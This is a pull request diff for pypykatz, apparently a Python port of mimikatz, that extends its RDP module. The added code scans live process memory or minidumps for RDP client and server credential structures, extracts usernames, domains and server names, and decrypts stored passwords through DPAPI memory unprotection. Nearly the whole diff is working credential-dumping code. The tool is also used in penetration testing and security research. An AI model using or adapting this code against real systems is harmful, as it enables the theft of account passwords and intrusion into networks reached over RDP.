### PR TITLE
Enhancement: RDP Module

### DIFF
--- a/pypykatz/commons/readers/local/live_reader.py
+++ b/pypykatz/commons/readers/local/live_reader.py
@@ -126,7 +126,10 @@ class BufferedLiveReader:
 				return
 				
 		raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)
-		
+
+	def get_reader(self):
+		return self.reader
+
 	def seek(self, offset, whence = 0):
 		"""
 		Changes the current address to an offset of offset. The whence parameter controls from which position should we count the offsets.
@@ -390,7 +393,17 @@ class LiveReader:
 			for mod in self.modules:
 				if mod.inrange(page.BaseAddress) == True:
 					mod.pages.append(page)
-		
+
+	def get_handler(self):
+		return self.process_handle
+
+	def get_memory(self, allocationprotect = 0x04):
+		t = []
+		for page in self.pages:
+			if page.AllocationProtect & allocationprotect:
+				t.append(page)
+		return t
+
 	def get_buffered_reader(self):
 		return BufferedLiveReader(self)			
 		

--- a/pypykatz/commons/readers/local/live_reader.py
+++ b/pypykatz/commons/readers/local/live_reader.py
@@ -88,7 +88,7 @@ class Page:
 				return fl
 			fl.append(marker + offset + self.BaseAddress)
 			data = data[marker+1:]
-			offset = marker + 1
+			offset += marker + 1
 				
 		return fl
 	

--- a/pypykatz/rdp/cmdhelper.py
+++ b/pypykatz/rdp/cmdhelper.py
@@ -59,7 +59,7 @@ class RDPCMDHelper:
 			self.run_live(args)
 		
 	def run_live(self, args):
-		credparsers = RDPCredParser.go_live(pid = args.pid, all_rdp = args.all)
+		credparsers = RDPCredParser.go_live(pid = args.pid, all_rdp = args.all, live_rdp_module = args.live_rdp_module)
 		for credparser in credparsers:
 			for cred in credparser.credentials:
 				print(str(cred))

--- a/pypykatz/rdp/cmdhelper.py
+++ b/pypykatz/rdp/cmdhelper.py
@@ -29,11 +29,11 @@ class RDPCMDHelper:
 		live_rdp_subparsers.required = True
 		live_rdp_subparsers.dest = 'live_rdp_module'
 
-		live_logonpasswords_group = live_rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials from the SERVER side')
+		live_logonpasswords_group = live_rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials (SERVER side)')
 		live_logonpasswords_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')
 		live_logonpasswords_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL rdpcorets.dll')
 
-		live_mstsc_group = live_rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials from the CLIENT side')
+		live_mstsc_group = live_rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials (CLIENT side)')
 		live_mstsc_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')
 		live_mstsc_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL mstscax.dll')
 
@@ -43,11 +43,11 @@ class RDPCMDHelper:
 		rdp_subparsers.required = True
 		rdp_subparsers.dest = 'rdp_module'
 
-		logonpasswords_group = rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials (SERVER side) from minidump file. Cleartext passwords only for WINVER <= Win2012')
+		logonpasswords_group = rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials (SERVER side) from minidump file. Plain-text passwords only for WINVER <= Win2012')
 		logonpasswords_group.add_argument('cmd', choices=['minidump'])
 		logonpasswords_group.add_argument('memoryfile', help='path to the dump file')
 
-		mstsc_group = rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials (CLIENT side) from minidump file.')
+		mstsc_group = rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials (CLIENT side) from minidump file. Unable to recover plain-text passwords offline.')
 		mstsc_group.add_argument('cmd', choices=['minidump'])
 		mstsc_group.add_argument('memoryfile', help='path to the dump file')
 

--- a/pypykatz/rdp/packages/creds/decryptor.py
+++ b/pypykatz/rdp/packages/creds/decryptor.py
@@ -189,7 +189,7 @@ class RDPCredentialDecryptorLogonpasswords:
             bIsCandidate = False
 
         try:
-            if bIsCandidate and rdpcred_entry.cbDomain <= 512 and rdpcred_entry.cbUsername <= 512 and rdpcred_entry.cbPassword <= 512 and rdpcred_entry.cbPassword > 0:
+            if bIsCandidate and rdpcred_entry.cbDomain <= 512 and rdpcred_entry.cbUsername <= 512 and rdpcred_entry.cbUsername > 0 and rdpcred_entry.cbPassword <= 512 and rdpcred_entry.cbPassword > 0:
                 domainame = rdpcred_entry.Domain[:rdpcred_entry.cbDomain].decode('utf-16-le')
                 username = rdpcred_entry.UserName[:rdpcred_entry.cbUsername].decode('utf-16-le')
                 password_raw = rdpcred_entry.Password[:rdpcred_entry.cbPassword]

--- a/pypykatz/rdp/packages/creds/decryptor.py
+++ b/pypykatz/rdp/packages/creds/decryptor.py
@@ -1,5 +1,6 @@
 import json
 import hashlib
+import math
 
 from pypykatz import logger
 from pypykatz.commons.common import hexdump
@@ -7,85 +8,226 @@ from pypykatz.commons.common import KatzSystemArchitecture, WindowsBuild, Window
 
 
 class RDPCredential:
-	def __init__(self):
-		self.credtype = 'rdp'
-		self.domainname = None
-		self.username = None
-		self.password = None
-		self.password_raw = None
+    def __init__(self):
+        self.credtype = 'rdp'
+        self.domainname = None
+        self.username = None
+        self.password = None
+        self.password_raw = None
+        self.isencrypted = None 
+        self.servername = ''
+        self.serverfqdn = ''
 
-	
-	def to_dict(self):
-		t = {}
-		t['credtype'] = self.credtype
-		t['domainname'] = self.cachedir
-		t['username'] = self.PRT
-		t['password'] = self.key_guid
-		t['password_raw'] = self.dpapi_key
-		return t
-		
-	def to_json(self):
-		return json.dumps(self.to_dict())
-		
-	def __str__(self):
-		t = '\t== RDP Credential ==\n'
-		t += '\t\tdomainname %s\n' % self.domainname
-		t += '\t\tusername %s\n' % self.username
-		t += '\t\tpassword %s\n' % self.password
-		t += '\t\tpassword_raw %s\n' % self.password_raw.hex()
-		return t
+    def to_dict(self):
+        t = {}
+        t['credtype'] = self.credtype
+        t['domainname'] = self.cachedir
+        t['username'] = self.PRT
+        t['password'] = self.key_guid
+        t['password_raw'] = self.dpapi_key
+        return t
+        
+    def to_json(self):
+        return json.dumps(self.to_dict())
+        
+    def __str__(self):
+        t = '\t== RDP Credential ==\n'
+        t += '\t\tdomainname %s\n' % self.domainname
+        t += '\t\tusername %s\n' % self.username
+        t += '\t\tpassword \'%s\'\n' % self.password
+        t += '\t\tpassword_raw %s\n' % self.password_raw.hex()
+        t += '\t\tisencrypted: %s\n' % str(self.isencrypted)
+        t += '\t\tservername: \'%s\'\n' % self.servername
+        t += '\t\tserverfqdn: \'%s\'\n' % self.serverfqdn
+        return t
 
-class RDPCredentialDecryptor:
-	def __init__(self, process, reader, decryptor_template, sysinfo):
-		self.process = process
-		self.reader = reader
-		self.sysinfo = sysinfo
-		self.decryptor_template = decryptor_template
-		self.credentials = []
+class RDPCredentialDecryptorMstsc:
+    def __init__(self, process, reader, decryptor_template, sysinfo):
+        self.process = process
+        self.reader = reader
+        self.sysinfo = sysinfo
+        self.decryptor_template = decryptor_template
+        self.credentials = []
 
-	def add_entry(self, rdpcred_entry):
-		try:
-			if rdpcred_entry.cbDomain <= 512 and rdpcred_entry.cbUsername <= 512 and rdpcred_entry.cbPassword <= 512 and rdpcred_entry.cbPassword > 0:
-				domainame = rdpcred_entry.Domain[:rdpcred_entry.cbDomain].decode('utf-16-le')
-				username = rdpcred_entry.UserName[:rdpcred_entry.cbUsername].decode('utf-16-le')
-				password_raw = rdpcred_entry.Password[:rdpcred_entry.cbPassword]
+    def find_string(self, chunck):
+        marker = chunck.find(b'\x00\x00')
+        if marker <= 0:
+            chunck = b''
+        return chunck[:marker + 1]
 
-				if self.sysinfo.buildnumber >= WindowsMinBuild.WIN_10.value:
-					if self.process is None:
-						raise Exception ('Credentials found but they are encrypted!')
+    def start(self, chunksize=10*1024):
+        x = self.reader.find_all_global(self.decryptor_template.signature)
+        if len(x) == 0:
+            logger.debug('No RDP credentials found!')
+            return
 
-					password_raw = self.process.dpapi_memory_unprotect(rdpcred_entry.Password_addr, rdpcred_entry.cbPassword, 0)
-					password = password_raw.decode('utf-16-le')
-				else:
-					password = password_raw.decode('utf-16-le')
-					password_raw = password_raw.split(b'\x00\x00')[0] + b'\x00'
+        for addr in x:
+            self.reader.move(addr)
+            properties = self.decryptor_template.properties_struct(self.reader)
+            if properties.unkh0 == int(0xdbcaabcd):
+                if properties.unkd1 >= 10 and properties.unkd1 < 500:
+                    if properties.cbProperties >= 10 and properties.cbProperties < 500:
+                        if properties.pProperties.value:
+                            """
+                            logger.debug("========TS_PROPERTIES_KIWI=========")
+                            logger.debug("unkh0 = {}".format(hex(properties.unkh0)))
+                            logger.debug("unkd0 = {}".format(hex(properties.unkd0)))
+                            logger.debug("unkp2 = {}".format(hex(properties.unkp2)))
+                            logger.debug("unkd1 = {}".format(properties.unkd1))
+                            logger.debug("unkp3 = {}".format(hex(properties.unkp3)))
+                            logger.debug("pProperties = {}".format(hex(properties.pProperties.value)))
+                            logger.debug("cbProperties = {}".format(properties.cbProperties))
+                            logger.debug("===================================")
+                            """
+                            try:
+                                self.reader.move(properties.pProperties.value)
+                                cred = RDPCredential()
+                
+                                for i in range(properties.cbProperties):
+                                    property = self.decryptor_template.property_struct(self.reader)
+                           
+                                    if property.szProperty and property.dwType > 0 and property.dwType < 20:
+                                        """
+                                        logger.debug("========TS_PROPERTY_KIWI=========")
+                                        logger.debug("szProperty = {}".format(hex(property.szProperty)))
+                                        logger.debug("dwType = {}".format(property.dwType))
+                                        logger.debug("pvData = {}".format(hex(property.pvData)))
+                                        logger.debug("unkp0 = {}".format(property.unkp0))
+                                        logger.debug("unkd0 = {}".format(property.unkd0))
+                                        logger.debug("dwFlags = {}".format(property.dwFlags))
+                                        logger.debug("unkd1 = {}".format(property.unkd1))
+                                        logger.debug("unkd2 = {}".format(property.unkd2))
+                                        logger.debug("pValidator = {}".format(hex(property.pValidator)))
+                                        logger.debug("unkp2 = {}".format(property.unkp2))
+                                        logger.debug("unkp3 = {}".format(property.unkp3))
+                                        logger.debug("=================================")
+                                        """
+                                        current_addr = self.reader.tell()
+                                        try:
+                                            self.reader.move(property.szProperty)
+                                            chunck = self.reader.read(1024)
+                                            string = self.find_string(chunck)
+                                            marker = string.find(b'\x00')
+                                            if marker > 0:
+                                                string = string[:marker]
+                                            szProperty = string.decode('utf-8')
 
-				cred = RDPCredential()
-				cred.domainname = domainame
-				cred.username = username
-				cred.password = password
-				cred.password_raw = password_raw
-				self.credentials.append(cred)
+                                            szProperties = ["ServerName", "ServerFqdn", "ServerNameUsedForAuthentication", "UserSpecifiedServerName", "UserName", "Domain", "Password", "SmartCardReaderName", "RDmiUsername", "PasswordContainsSCardPin"]
+                                            if szProperty in szProperties:
+                                                value = ''
+                                                if property.dwType == 3:
+                                                    value = "TRUE" if property.pvData else "FALSE"
+                                                    #print("{:<35s}\t[bool] {}".format(szProperty, "TRUE" if property.pvData else "FALSE"))
 
-			else:
-				logger.debug('This RDPCred entry is garbage!')
-		except Exception as e:
-			logger.debug('RDP entry parsing error! Reason %s' % e)
-			
-	
-	def start(self):
-		for signature in self.decryptor_template.signatures:
-			x = self.reader.find_all_global(signature)
-			if len(x) == 0:
-				logger.debug('No RDP credentials found!')
-				return
-			for addr in x:
-				addr += self.decryptor_template.offset
-				self.reader.move(addr)
-				#print(hexdump(self.reader.peek(0x100)))
-				try:
-					cred = self.decryptor_template.cred_struct(self.reader)
-				except Exception as e:
-					logger.debug('Reading error! (this can be normal here) %s' % str(e))
-					continue
-				self.add_entry(cred)
+                                                if property.dwType == 4:
+                                                    self.reader.move(property.pvData)
+                                                    chunck = self.reader.read(1024)
+                                                    string = self.find_string(chunck)
+                                                    value = string.decode('utf-16-le')
+                                                    #print("{:<35s}\t[wstring] '{}'".format(szProperty, string.decode('utf-16-le')))
+                                                    
+                                                elif property.dwType == 6:  
+                                                    if property.pvData and property.unkp2:
+                                                        self.reader.move(property.pvData)
+                                                        chunck = self.reader.read(property.unkp2)
+                                                        if property.dwFlags & 0x800:
+                                                            #print("{:<35s}\t[protect] {} (length = {})".format(szProperty, chunck, property.unkp2))
+                                                            value = chunck
+                                                        else:
+                                                            #print("{:<35s}\t[unprotect] {} (length = {})".format(szProperty, chunck, property.unkp2))
+                                                            value = chunck
+
+                                                if szProperty == "ServerName":
+                                                    cred.servername = value
+                                                elif szProperty == "ServerFqdn":
+                                                    cred.serverfqdn = value
+                                                elif szProperty == "UserName":
+                                                    cred.username = value
+                                                elif szProperty == "Domain":
+                                                    cred.domainname = value
+                                                elif szProperty == "Password" and (property.dwFlags & 0x800):
+                                                    cred.password_raw = value
+                                                    cred.password = ''
+                                                    cred.isencrypted = True
+                                                elif szProperty == "Password":
+                                                    cred.password_raw = value
+                                                    cred.password = value.decode('utf-16-le')
+                                                    cred.isencrypted = False
+
+                                        except Exception as e: # Memory address not in process memory space
+                                            logger.debug("Error: {}".format(e))
+                                        self.reader.move(current_addr)
+                                
+                                if cred.username:
+                                    self.credentials.append(cred)    
+
+                            except Exception as e: # Memory address not in process memory space
+                                logger.debug("Error: {}".format(e))
+
+class RDPCredentialDecryptorLogonpasswords:
+    def __init__(self, process, reader, decryptor_template, sysinfo):
+        self.process = process
+        self.reader = reader
+        self.sysinfo = sysinfo
+        self.decryptor_template = decryptor_template
+        self.credentials = []
+
+    def add_entry(self, rdpcred_entry):
+        if hex(rdpcred_entry.unk1.value & 0xff010000) == hex(0x00010000): # mstscax & freerdp
+            bIsCandidate = True
+        elif not hex(rdpcred_entry.unk1.value & 0xffff0000): # rdesktop
+            bIsCandidate = True
+        else:
+            bIsCandidate = False
+
+        try:
+            if bIsCandidate and rdpcred_entry.cbDomain <= 512 and rdpcred_entry.cbUsername <= 512 and rdpcred_entry.cbPassword <= 512 and rdpcred_entry.cbPassword > 0:
+                domainame = rdpcred_entry.Domain[:rdpcred_entry.cbDomain].decode('utf-16-le')
+                username = rdpcred_entry.UserName[:rdpcred_entry.cbUsername].decode('utf-16-le')
+                password_raw = rdpcred_entry.Password[:rdpcred_entry.cbPassword]
+
+                if self.sysinfo.buildnumber >= WindowsMinBuild.WIN_10.value:
+                    if self.process is None:
+                        logger.debug('Credentials found but they are encrypted!')
+                        password_raw = rdpcred_entry.Password[:16 * math.ceil(rdpcred_entry.cbPassword/16)]
+                        password = ''
+                        isencrypted = True
+                    else:
+                        password_raw = self.process.dpapi_memory_unprotect(rdpcred_entry.Password_addr, rdpcred_entry.cbPassword, 0)
+                        password = password_raw.decode('utf-16-le')
+                        isencrypted = False
+                else:
+                    password = password_raw.decode('utf-16-le')
+                    password_raw = password_raw.split(b'\x00\x00')[0] + b'\x00'
+                    isencrypted = False
+
+                cred = RDPCredential()
+                cred.domainname = domainame
+                cred.username = username
+                cred.password = password
+                cred.password_raw = password_raw
+                cred.isencrypted = isencrypted
+                self.credentials.append(cred)
+
+            else:
+                logger.debug('This RDPCred entry is garbage!')
+        except Exception as e:
+            logger.debug('RDP entry parsing error! Reason %s' % e)
+            
+    
+    def start(self):
+        for signature in self.decryptor_template.signatures:
+            x = self.reader.find_all_global(signature)
+            if len(x) == 0:
+                logger.debug('No RDP credentials found!')
+                return
+            for addr in x:
+                addr += self.decryptor_template.offset
+                self.reader.move(addr)
+                
+                try:
+                    cred = self.decryptor_template.cred_struct(self.reader)
+                except Exception as e:
+                    logger.debug('Reading error! (this can be normal here) %s' % str(e))
+                    continue
+                self.add_entry(cred)

--- a/pypykatz/rdp/packages/creds/decryptor.py
+++ b/pypykatz/rdp/packages/creds/decryptor.py
@@ -35,7 +35,12 @@ class RDPCredential:
         t += '\t\tdomainname %s\n' % self.domainname
         t += '\t\tusername %s\n' % self.username
         t += '\t\tpassword \'%s\'\n' % self.password
-        t += '\t\tpassword_raw %s\n' % self.password_raw.hex()
+
+        try:
+            t += '\t\tpassword_raw %s\n' % self.password_raw.hex()
+        except:
+            t += '\t\tpassword_raw %s\n' % self.password_raw
+
         t += '\t\tisencrypted: %s\n' % str(self.isencrypted)
         t += '\t\tservername: \'%s\'\n' % self.servername
         t += '\t\tserverfqdn: \'%s\'\n' % self.serverfqdn
@@ -141,6 +146,8 @@ class RDPCredentialDecryptorMstsc:
                                                             #print("{:<35s}\t[unprotect] {} (length = {})".format(szProperty, chunck, property.unkp2))
                                                             value = chunck
 
+                                                if value is None:
+                                                    value = b''
                                                 if szProperty == "ServerName":
                                                     cred.servername = value
                                                 elif szProperty == "ServerFqdn":

--- a/pypykatz/rdp/packages/creds/decryptor.py
+++ b/pypykatz/rdp/packages/creds/decryptor.py
@@ -11,8 +11,8 @@ class RDPCredential:
     def __init__(self):
         self.credtype = 'rdp'
         self.domainname = None
-        self.username = None
-        self.password = None
+        self.username = ''
+        self.password = ''
         self.password_raw = None
         self.isencrypted = None 
         self.servername = ''
@@ -47,12 +47,13 @@ class RDPCredential:
         return t
 
 class RDPCredentialDecryptorMstsc:
-    def __init__(self, process, reader, decryptor_template, sysinfo):
+    def __init__(self, process, reader, decryptor_template, sysinfo, find_first=False):
         self.process = process
         self.reader = reader
         self.sysinfo = sysinfo
         self.decryptor_template = decryptor_template
         self.credentials = []
+        self.find_first = find_first
 
     def find_string(self, chunck):
         marker = chunck.find(b'\x00\x00')
@@ -60,132 +61,149 @@ class RDPCredentialDecryptorMstsc:
             chunck = b''
         return chunck[:marker + 1]
 
-    def start(self, chunksize=10*1024):
-        x = self.reader.find_all_global(self.decryptor_template.signature)
+    def find_entries(self, chunksize=10*1024):
+        reader = self.reader.get_reader()
+        handler = reader.get_handler() 
+        memory_segments = reader.get_memory() 
 
-        if not len(x):
-            logger.debug('No RDP credentials found!')
-            return
+        #x = self.reader.find_all_global(self.decryptor_template.signature)
+        for ms in memory_segments:
+            x = ms.search(self.decryptor_template.signature, handler)
 
-        for addr in x:
-            self.reader.move(addr)
-            properties = self.decryptor_template.properties_struct(self.reader)
-            if properties.unkh0 == int(0xdbcaabcd):
-                if properties.unkd1 >= 10 and properties.unkd1 < 500:
-                    if properties.cbProperties >= 10 and properties.cbProperties < 500:
-                        if properties.pProperties.value:
-                            """
-                            logger.debug("========TS_PROPERTIES_KIWI=========")
-                            logger.debug("unkh0 = {}".format(hex(properties.unkh0)))
-                            logger.debug("unkd0 = {}".format(hex(properties.unkd0)))
-                            logger.debug("unkp2 = {}".format(hex(properties.unkp2)))
-                            logger.debug("unkd1 = {}".format(properties.unkd1))
-                            logger.debug("unkp3 = {}".format(hex(properties.unkp3)))
-                            logger.debug("pProperties = {}".format(hex(properties.pProperties.value)))
-                            logger.debug("cbProperties = {}".format(properties.cbProperties))
-                            logger.debug("===================================")
-                            """
-                            try:
-                                self.reader.move(properties.pProperties.value)
-                                cred = RDPCredential()
-                
-                                for i in range(properties.cbProperties):
-                                    property = self.decryptor_template.property_struct(self.reader)
-                           
-                                    if property.szProperty and property.dwType > 0 and property.dwType < 20:
-                                        """
-                                        logger.debug("========TS_PROPERTY_KIWI=========")
-                                        logger.debug("szProperty = {}".format(hex(property.szProperty)))
-                                        logger.debug("dwType = {}".format(property.dwType))
-                                        logger.debug("pvData = {}".format(hex(property.pvData)))
-                                        logger.debug("unkp0 = {}".format(property.unkp0))
-                                        logger.debug("unkd0 = {}".format(property.unkd0))
-                                        logger.debug("dwFlags = {}".format(property.dwFlags))
-                                        logger.debug("unkd1 = {}".format(property.unkd1))
-                                        logger.debug("unkd2 = {}".format(property.unkd2))
-                                        logger.debug("pValidator = {}".format(hex(property.pValidator)))
-                                        logger.debug("unkp2 = {}".format(property.unkp2))
-                                        logger.debug("unkp3 = {}".format(property.unkp3))
-                                        logger.debug("=================================")
-                                        """
-                                        current_addr = self.reader.tell()
-                                        try:
-                                            self.reader.move(property.szProperty)
-                                            chunck = self.reader.read(1024)
-                                            string = self.find_string(chunck)
-                                            marker = string.find(b'\x00')
-                                            if marker > 0:
-                                                string = string[:marker]
-                                            szProperty = string.decode('utf-8')
+            for addr in x:
+                self.reader.move(addr)
+                properties = self.decryptor_template.properties_struct(self.reader)
+                if properties.unkh0 == int(0xdbcaabcd):
+                    if properties.unkd1 >= 10 and properties.unkd1 < 500:
+                        if properties.cbProperties >= 10 and properties.cbProperties < 500:
+                            if properties.pProperties.value:
+                                """
+                                logger.debug("========TS_PROPERTIES_KIWI=========")
+                                logger.debug("unkh0 = {}".format(hex(properties.unkh0)))
+                                logger.debug("unkd0 = {}".format(hex(properties.unkd0)))
+                                logger.debug("unkp2 = {}".format(hex(properties.unkp2)))
+                                logger.debug("unkd1 = {}".format(properties.unkd1))
+                                logger.debug("unkp3 = {}".format(hex(properties.unkp3)))
+                                logger.debug("pProperties = {}".format(hex(properties.pProperties.value)))
+                                logger.debug("cbProperties = {}".format(properties.cbProperties))
+                                logger.debug("===================================")
+                                """
+                                try:
+                                    self.reader.move(properties.pProperties.value)
+                                    cred = RDPCredential()
+                    
+                                    for i in range(properties.cbProperties):
+                                        property = self.decryptor_template.property_struct(self.reader)
+                               
+                                        if property.szProperty and property.dwType > 0 and property.dwType < 20:
+                                            """
+                                            logger.debug("========TS_PROPERTY_KIWI=========")
+                                            logger.debug("szProperty = {}".format(hex(property.szProperty)))
+                                            logger.debug("dwType = {}".format(property.dwType))
+                                            logger.debug("pvData = {}".format(hex(property.pvData)))
+                                            logger.debug("unkp0 = {}".format(property.unkp0))
+                                            logger.debug("unkd0 = {}".format(property.unkd0))
+                                            logger.debug("dwFlags = {}".format(property.dwFlags))
+                                            logger.debug("unkd1 = {}".format(property.unkd1))
+                                            logger.debug("unkd2 = {}".format(property.unkd2))
+                                            logger.debug("pValidator = {}".format(hex(property.pValidator)))
+                                            logger.debug("unkp2 = {}".format(property.unkp2))
+                                            logger.debug("unkp3 = {}".format(property.unkp3))
+                                            logger.debug("=================================")
+                                            """
+                                            current_addr = self.reader.tell()
+                                            try:
+                                                self.reader.move(property.szProperty)
+                                                chunck = self.reader.read(1024)
+                                                string = self.find_string(chunck)
+                                                marker = string.find(b'\x00')
+                                                if marker > 0:
+                                                    string = string[:marker]
+                                                szProperty = string.decode('utf-8')
 
-                                            szProperties = ["ServerName", "ServerFqdn", "ServerNameUsedForAuthentication", "UserSpecifiedServerName", "UserName", "Domain", "Password", "SmartCardReaderName", "RDmiUsername", "PasswordContainsSCardPin"]
-                                            if szProperty in szProperties:
-                                                value = ''
-                                                if property.dwType == 3:
-                                                    value = "TRUE" if property.pvData else "FALSE"
-                                                    #print("{:<35s}\t[bool] {}".format(szProperty, "TRUE" if property.pvData else "FALSE"))
+                                                szProperties = ["ServerName", "ServerFqdn", "ServerNameUsedForAuthentication", "UserSpecifiedServerName", "UserName", "Domain", "Password", "SmartCardReaderName", "RDmiUsername", "PasswordContainsSCardPin"]
+                                                if szProperty in szProperties:
+                                                    value = ''
+                                                    if property.dwType == 3:
+                                                        value = "TRUE" if property.pvData else "FALSE"
+                                                        #print("{:<35s}\t[bool] {}".format(szProperty, "TRUE" if property.pvData else "FALSE"))
 
-                                                if property.dwType == 4:
-                                                    self.reader.move(property.pvData)
-                                                    chunck = self.reader.read(1024)
-                                                    string = self.find_string(chunck)
-                                                    value = string.decode('utf-16-le')
-                                                    #print("{:<35s}\t[wstring] '{}'".format(szProperty, string.decode('utf-16-le')))
-                                                    
-                                                elif property.dwType == 6:  
-                                                    if property.pvData and property.unkp2:
+                                                    if property.dwType == 4:
                                                         self.reader.move(property.pvData)
-                                                        chunck = self.reader.read(property.unkp2)
-                                                        if property.dwFlags & 0x800:
-                                                            #print("{:<35s}\t[protect] {} (length = {})".format(szProperty, chunck, property.unkp2))
-                                                            if self.process is None:
-                                                                value = chunck
+                                                        chunck = self.reader.read(1024)
+                                                        string = self.find_string(chunck)
+                                                        value = string.decode('utf-16-le')
+                                                        #print("{:<35s}\t[wstring] '{}'".format(szProperty, string.decode('utf-16-le')))
+                                                        
+                                                    elif property.dwType == 6:  
+                                                        if property.pvData and property.unkp2:
+                                                            self.reader.move(property.pvData)
+                                                            chunck = self.reader.read(property.unkp2)
+                                                            if property.dwFlags & 0x800:
+                                                                #print("{:<35s}\t[protect] {} (length = {})".format(szProperty, chunck, property.unkp2))
+                                                                if self.process is None:
+                                                                    value = chunck
+                                                                else:
+                                                                    value = self.process.dpapi_memory_unprotect(property.pvData, property.unkp2, 0)
+                                                                    if len(value) > 4:
+                                                                        value = value[4:]
                                                             else:
-                                                                value = self.process.dpapi_memory_unprotect(property.pvData, property.unkp2, 0)
+                                                                #print("{:<35s}\t[unprotect] {} (length = {})".format(szProperty, chunck, property.unkp2))
+                                                                value = chunck
+
+                                                    if value is None:
+                                                        value = b''
+                                                    if szProperty == "ServerName":
+                                                        cred.servername = value
+                                                    elif szProperty == "ServerFqdn":
+                                                        cred.serverfqdn = value
+                                                    elif szProperty == "UserName":
+                                                        cred.username = value
+                                                    elif szProperty == "Domain":
+                                                        cred.domainname = value
+                                                    elif szProperty == "Password" and (property.dwFlags & 0x800):
+                                                        cred.password_raw = value
+                                                        if self.process is None:
+                                                            cred.password = ''
+                                                            cred.isencrypted = True
                                                         else:
-                                                            #print("{:<35s}\t[unprotect] {} (length = {})".format(szProperty, chunck, property.unkp2))
-                                                            value = chunck
-
-                                                if value is None:
-                                                    value = b''
-                                                if szProperty == "ServerName":
-                                                    cred.servername = value
-                                                elif szProperty == "ServerFqdn":
-                                                    cred.serverfqdn = value
-                                                elif szProperty == "UserName":
-                                                    cred.username = value
-                                                elif szProperty == "Domain":
-                                                    cred.domainname = value
-                                                elif szProperty == "Password" and (property.dwFlags & 0x800):
-                                                    cred.password_raw = value
-                                                    if self.process is None:
-                                                        cred.password = ''
-                                                        cred.isencrypted = True
-                                                    else:
-                                                        cred.password = cred.password_raw.decode('utf-16-le')
+                                                            cred.password = cred.password_raw.decode('utf-16-le').rstrip('\x00')
+                                                            cred.isencrypted = False
+                                                    elif szProperty == "Password":
+                                                        cred.password_raw = value
+                                                        cred.password = value.decode('utf-16-le')
                                                         cred.isencrypted = False
-                                                elif szProperty == "Password":
-                                                    cred.password_raw = value
-                                                    cred.password = value.decode('utf-16-le')
-                                                    cred.isencrypted = False
 
-                                        except Exception as e: # Memory address not in process memory space
-                                            logger.debug("Error: {}".format(e))
-                                        self.reader.move(current_addr)
-                                
-                                if cred.username:
-                                    self.credentials.append(cred)    
+                                            except Exception as e: # Memory address not in process memory space
+                                                logger.debug("Error: {}".format(e))
+                                            self.reader.move(current_addr)
+                                    
+                                    if cred.username:
+                                        self.credentials.append(cred)    
+                                        if self.find_first:
+                                            return
 
-                            except Exception as e: # Memory address not in process memory space
-                                logger.debug("Error: {}".format(e))
+                                except Exception as e: # Memory address not in process memory space
+                                    logger.debug("Error: {}".format(e))
+
+
+    def start(self, chunksize=10*1024):
+        #x = self.reader.find_all_global(self.decryptor_template.signature)
+        self.find_entries(chunksize)
+        if not len(self.credentials):
+            logger.debug('No RDP credentials found!')
+
 
 class RDPCredentialDecryptorLogonpasswords:
-    def __init__(self, process, reader, decryptor_template, sysinfo):
+    def __init__(self, process, reader, decryptor_template, sysinfo, find_first=False, lower_bound=0, upper_bound=-1):
         self.process = process
         self.reader = reader
         self.sysinfo = sysinfo
         self.decryptor_template = decryptor_template
         self.credentials = []
+        self.find_first = find_first
+        self.lower_bound = lower_bound
+        self.upper_bound = upper_bound
 
     def add_entry(self, rdpcred_entry):
         if hex(rdpcred_entry.unk1.value & 0xff010000) == hex(0x00010000): # mstscax & freerdp
@@ -209,7 +227,7 @@ class RDPCredentialDecryptorLogonpasswords:
                         isencrypted = True
                     else:
                         password_raw = self.process.dpapi_memory_unprotect(rdpcred_entry.Password_addr, rdpcred_entry.cbPassword, 0)
-                        password = password_raw.decode('utf-16-le')
+                        password = password_raw.decode('utf-16-le').rstrip('\x00')
                         isencrypted = False
                 else:
                     password = password_raw.decode('utf-16-le')
@@ -230,19 +248,32 @@ class RDPCredentialDecryptorLogonpasswords:
             logger.debug('RDP entry parsing error! Reason %s' % e)
             
     
-    def start(self):
-        for signature in self.decryptor_template.signatures:
-            x = self.reader.find_all_global(signature)
-            if len(x) == 0:
-                logger.debug('No RDP credentials found!')
-                return
-            for addr in x:
-                addr += self.decryptor_template.offset
-                self.reader.move(addr)
-                
-                try:
-                    cred = self.decryptor_template.cred_struct(self.reader)
-                except Exception as e:
-                    logger.debug('Reading error! (this can be normal here) %s' % str(e))
-                    continue
-                self.add_entry(cred)
+    def start(self, chunksize=10*1024):
+        reader = self.reader.get_reader()
+        handler = reader.get_handler() 
+        memory_segments = reader.get_memory() 
+
+        if self.upper_bound == -1:
+            self.upper_bound = len(memory_segments)
+
+        for idx, ms in enumerate(memory_segments):
+            if idx > self.lower_bound and idx < self.upper_bound:
+                x = []
+                for signature in self.decryptor_template.signatures:
+                    x += ms.search(signature, handler)
+            
+                for addr in x:
+                    addr += self.decryptor_template.offset
+                    self.reader.move(addr)
+                        
+                    try:
+                        cred = self.decryptor_template.cred_struct(self.reader)
+                    except Exception as e:
+                        logger.debug('Reading error! (this can be normal here) %s' % str(e))
+                        continue
+
+                    self.add_entry(cred)
+                    if len(self.credentials) > 0 and self.find_first:
+                        return
+
+

--- a/pypykatz/rdp/packages/creds/templates.py
+++ b/pypykatz/rdp/packages/creds/templates.py
@@ -3,15 +3,20 @@ from pypykatz.commons.common import KatzSystemArchitecture, WindowsBuild, Window
 from pypykatz.commons.win_datatypes import POINTER, ULONG, \
 	KIWI_GENERIC_PRIMARY_CREDENTIAL, PVOID, DWORD, LUID, \
 	LSA_UNICODE_STRING, WORD
+from minidump.win_datatypes import PCWSTR
 from pypykatz.commons.common import hexdump
 
 class RDPCredsTemplate:
 	def __init__(self):
+		self.signatures = None
 		self.signature = None
+
 		self.cred_struct = None
+		self.property_struct = None
+		self.properties_struct = None
 
 	@staticmethod
-	def get_template(sysinfo):
+	def get_logonpasswords_template(sysinfo):
 		template = RDPCredsTemplate()
